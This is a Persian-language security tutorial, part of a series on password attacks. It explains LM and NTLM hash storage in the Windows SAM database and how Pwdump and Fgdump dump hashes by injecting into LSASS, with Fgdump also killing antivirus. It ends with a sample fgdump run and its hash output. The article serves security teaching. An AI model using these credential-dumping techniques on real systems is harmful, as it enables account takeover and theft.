درخواست های ارتباط
جستجو
لیست دوستان من
صندوق پیام
همه را دیدم
  • در حال دریافت لیست پیام ها
صندوق پیام
رویدادها
همه را دیدم
  • در حال دریافت لیست رویدادها
همه رویدادهای من
تخفیف های وب سایت
همه تخفیف ها

عضویت در

کانال تلگرام

توسینسو

اطلاعات مطلب
مدرس/نویسنده
احسان امجدی
امتیاز: 58514
رتبه:14
1
199
45
620
احسان امجدی ، مشاور امنیت اطلاعات و ارتباطات و تست نفوذ سنجی ، هکر کلاه سفید ، مدرس دوره های تخصصی امنیت اطلاعات و شبکه ، تخصص در حوزه های سرویس های مایکروسافت ، Routing و Switching ، مجازی سازی ، امنیت اطلاعات و تست نفوذ ، کشف جرائم رایانه ای و سیستم عامل لینوکس ، متخصص در حوزه SOC و ... پروفایل کاربر

روش های هک پسورد - بخش دوم::: Fgdump و Pwdump

تاریخ 43 ماه قبل
نظرات 0
بازدیدها 1850
سلام به دوستان عزیز ITPro ای و علاقه مندان به مباحث امنیت شبکه. در ادامه سری مباحث هک و حملات پسوردها امروز ابعاد دیگری از این بحث را برای شما توضیح میدهم. در این نکته به توضیح و نحوه بدست آوردن هش های پسورد از طریق Fgdump و Pwdump میپردازم. با ادامه مطلب همراه باشید:
سیستم های عامل ویندوز پسوردهای هش شده یوزرها را در Security Account Manager (SAM) نگهداری میکند. برای جلوگیری از حملات آفلاین دیتابیس SAM، مایکروسافت قابلیت SYSKEY ( ویندوز NT 4.0 SP3) را معرفی کرده است که میتواند تا حدودی فایل SAM را رمزنگاری کند.
سیستم های عامل مبتنی بر ویندوز NT، هش های پسورد را به دو صورت متفاوت نگهداری میکنند:
• (LAN Manager (LM که بر اساس الگوریتم DES است.
• (NT LAN Manager (NTLM که بر اساس الگوریتم رمزنگاری MD4 عمل میکند.
در این میان LM نسبت به NTLM بنا به دلایل زیر ضعیفتر است:
پسوردهای با بیش از هفت کاراکتر به دو رشته جدا تقسیم میشوند و هر بخش بطور جداگانه هش میشود.
پسورد قبل از آن که هش شود، به حروف بزرگ تبدیل میشود.
مکانیزم هشینگ LM شامل salt ها نمیشود. در این صورت حملات علیه rainbow table امکان پذیر خواهد بود.
نکته: در رمزنگاری، یک salt دیتای تصادفی است که به عنوان یک ورودی اضافه در یک تابع یکطرفه استفاده میشود؛ که میتواند کلمه عبور و یا پسورد را هش کند. اصلی ترین عملکرد salt ها محافظت در برابر حملات دیکشنری بر حسب لیستی از هش های پسورد و همچنین محافظت در برابر حملات از پیش محاسبه شده rainbow table است.
از ویندوز ویستا به بعد، LM بطور پیش فرض بر روی سیستم عامل غیر فعال است و از NTLM استفاده میشود که به حروف بزرگ و کوچک حساس است، تمام کاراکترهای Unicode را پشتبانی میکند و محدودیت ذخیره سازی پسورد در دو بخش را ندارد. اما با تمام این حرفا هنوزهم هش های ذخیره شده NTLM در دیتابیس SAM، هنوز salt نشده اند.
دیتابیس SAM تا زمانی که سیستم عامل در حال اجراست، نمیتواند کپی شود؛ بنابراین کرنل ویندوز بطور اختصاصی فایل سیستم را بر این فایل قفل نگه میدارد. اما با این وجود حملاتی که برای ضربه زدن به هش های SAM اجرا میشوند از تکنیک های مختلفی برای این کار استفاده خواهند کرد. بنابراین قفل بودن فایل توسط کرنل ویندوز، حاشیه زیاد امنی محسوب نمیشود.
Pwdump و Fgdump نمونه های خوبی از ابزاری هستند که میتوانند حملات in-memory را انجام دهند. آن ها این کار را با وارد کردن یک DLL (شامل hash dumping code است) به فرآیند (Local Security Authority Subsystem (LSASS انجام میدهند. فرآیند LSASS دسترسی های لازم را برای استخراج هش های پسورد بمانند بسیاری از API های کاربردی که در ابزار hash dumping کاربرد دارند، در اختیار دارد.
عملکرد Fgdump بسیار شبیه Pwdump است با این تفاوت که علاوه بر این شباهت ها، قبل از تلاش برای dump کردن هش های پسورد و اطلاعات ذخیره شده، اقدام به بستن پروسه آنتی ویروس (Kill) میکند.
C:\> fgdump.exe
Fgdump 2.1.0 – fizzing and the mighty group at foofus.net
Written to make j0m0kun,s life just a bit easier
Copyright© 2008 fizzing and foofus.net
…

** Beginning Local dump**
Os (127.0.0.1): Microsoft windos unknown server (build 7601)  (64-bit)
Passwords dumped successfully
Cache dumped successfully
------summary------
Failed servers:
NONE
Successful servers:
127.0.0.1

Total failed:0
Total successful:1

C:\>type 127.0.0.1.pwdump
Admin:500:NO PASSWORD*************************:640526A548DF8596964212CDE11257533
Ehsan:1000:NO PASSWORD:************************:56325A5893C212541DC1211252555B555
Milad:1003:NO PASSWORD:************************:45896541214C11222B111A44552233665
Farhad:1004:NO PASSWORD:***********************:44522122222C2256331414A11166223B4
Guest:501:NO PASSWORD:*************************:56631A332211548C1145A12226666B414

پایان بخش دوم
سربلند و مانا باشید.

نویسنده: احسان امجدی
منبع: جزیره امنیت اطلاعات و ارتباطات وب سایت توسینسو
هرگونه نشر و کپی برداری بدون ذکر منبع و نام نویسنده دارای اشکال اخلاقی می باشد.
برچسب ها
ردیف عنوان
1 روش های هک پسورد - بخش اول::: حملات دیکشنری و Brute-force
2 روش های هک پسورد - بخش دوم::: Fgdump و Pwdump
3 روش های هک پسورد - بخش سوم::: ابزار (Windows Credential Editor (WCE
4 روش های هک پسورد - بخش چهارم::: تکنیک های Password Profiling و Password Mutating
5 روش های هک پسورد - بخش پنجم::: Online password attacks
6 روش های هک پسورد - بخش ششم::: Password Hash Attacks
دوره مجموعه کل دوره
مطالب مرتبط

در حال دریافت اطلاعات

نظرات
هیچ نظری ارسال نشده است

    برای ارسال نظر ابتدا به سایت وارد شوید